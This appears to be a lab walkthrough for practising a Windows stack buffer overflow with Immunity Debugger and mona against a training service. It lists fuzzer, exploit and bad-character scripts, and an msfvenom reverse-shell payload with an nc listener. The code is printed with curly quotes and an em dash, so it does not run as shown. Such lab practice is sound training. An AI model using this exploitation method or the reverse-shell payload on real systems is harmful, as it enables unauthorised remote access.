Buffer overflow using Immunity Debugger

· Right-click the Immunity Debugger icon on the Desktop and choose “Run as administrator”.

· Open the executable file in Immunity Debugger and run it.

· Run !mona config -set workingfolder c:\mona\%p

· Run the fuzzer.py program, to know what is the largest number of bytes were sent before it’s crashed.

· Exploit the BOF by running exploit.py

o Create payload by /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600 and put in exploit.py payload variable.

· Run !mona findmsp -distance 600 to Fund the EIP.

· Update your exploit.py script

o set the offset variable to this value.

o Set the payload variable to an empty string again.

o Set the retn variable to “BBBB”.

o Run exploit.py again.

· To find bad characters

o !mona bytearray -b “\x00” create an array without null bytes.

o Run badchars.py to generate bad characters string.

o Put the string on payload variable in exploit.py then run it.

o Run !mona compare -f C:\mona\oscp\bytearray.bin -a <ESP>.

o Repeate running the comparison until the result returns Unmodified.

· To find jump data

o Run !mona jmp -r esp -cpb “bad_character”

o Put the result in retn variable in exploit.py.

· Generate the payload

o msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b “bad_character” -f c

o Put the string on payload variable in exploit.py.

o Put padding variable as “\x90” * 16 to generate some space in memory.

o Nc -nlvp LPORT

o Run exploit.py.

Fuzzer.py code

#!/usr/bin/env python3

import socket, time, sys

ip = “MACHINE_IP”

port = 1337

timeout = 5

prefix = “OVERFLOW1 “

string = prefix + “A” * 100

while True:

try:

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:

s.settimeout(timeout)

s.connect((ip, port))

s.recv(1024)

print(“Fuzzing with {} bytes”.format(len(string) — len(prefix)))

s.send(bytes(string, “latin-1”))

s.recv(1024)

except:

print(“Fuzzing crashed at {} bytes”.format(len(string) — len(prefix)))

sys.exit(0)

string += 100 * “A”

time.sleep(1)

exploit.py code

import socket

ip = “MACHINE_IP”

port = 1337

prefix = “OVERFLOW1 “

offset = 0

overflow = “A” * offset

retn = “”

padding = “”

payload = “”

postfix = “”

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

s.connect((ip, port))

print(“Sending evil buffer…”)

s.send(bytes(buffer + “\r\n”, “latin-1”))

print(“Done!”)

except:

print(“Could not connect.”)

badchars.py code

for x in range(1, 256):

print(“\\x” + “{:02x}”.format(x), end=’’)

print()